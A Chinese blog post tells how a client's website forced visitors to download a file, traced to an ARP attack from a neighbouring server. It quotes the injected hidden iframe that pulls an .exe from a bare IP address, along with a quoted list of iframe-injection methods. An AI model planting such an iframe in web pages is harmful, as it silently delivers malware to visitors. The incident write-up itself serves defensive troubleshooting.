网站被黑,打开网页自动下载文件

今天上班,来了个电话,接起来之后,客户说网站被黑了。一打开网页,就下载文件。

于是我打开客户说的网页,试了下,还真是自动下载了1个 1.exe 文件。


查看源代码,发现最上面一行, 有 <iframe src= http://121.41.109.152/1.exe width=0 height=0></iframe>   这个代码。   


没办法,于是远程连接服务器 到服务器上 ,查看程序文件。但确认了几片,服务器上的程序文件都是正常的,并没有发现上面那行代码。


这是什么情况?    于是 上网上搜索 “网页被插入 <iframe>” ,  找到 一篇文章,原文地址(http://www.splaybow.com/post/insertiframe08450711122007.html)


1、直接在每个页面加入一句:<iframe src='http://www.xxx.com/mm.htm'></iframe>,遇到这种情况比较讨厌,因为这是一个一点“环保意识”都没有的黑客。恢复的办法是找一个“批量文件替换器”,对网站进行通篇查找,遇到上面那串代码就把它替换成空。
2、在网站的公共包含文件里面插入这句代码:比如说,一个公共的asp头部文件,尾部文件,或者是js脚本文件等都有可能。解决办法就是把它找出来,然后删除它。当然,要把它找出来,得稍微动动脑筋。
3、比较强的一种,把代码放在Flash里面。Flash支持ActionScript,而ActionScript又跟Javascript差不多,Javascript能做的事情,它基本上也能做,所以要插入一句<iframe>是很容易的事情。要找出来可比较难,IE有一个httpwatch插件,它可能跟踪IE载入网页元素的代码,你可以看得到它在载入什么元素的时候出现的<iframe>,如果正好出现<iframe>之前是一个flash,那么恭喜你,就是它了。
4、ARP攻击。关于什么是arp攻击,我就不多说了,唯一提醒一下的是,这种情况下,你的网站可能根本就没有被人改什么,看到iframe代码是因为和你网站服务器同处一个网段的某服务器在攻击你。解决办法是联系相应的网络管理人员。如果你就是该网络的管理人员,那就不用我多说什么了吧,找到“某”,断掉它。


看了上面的文章,感觉自己遇到的情况,与第4中比较像。于是 拨通IDC机房负责人电话,将遇到情况给他们反馈了下,让他们查询了下。

过了大概1小时左右,机房那边查到了恶意arp攻击ip,封掉了IP。于是网站恢复正常! 





  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值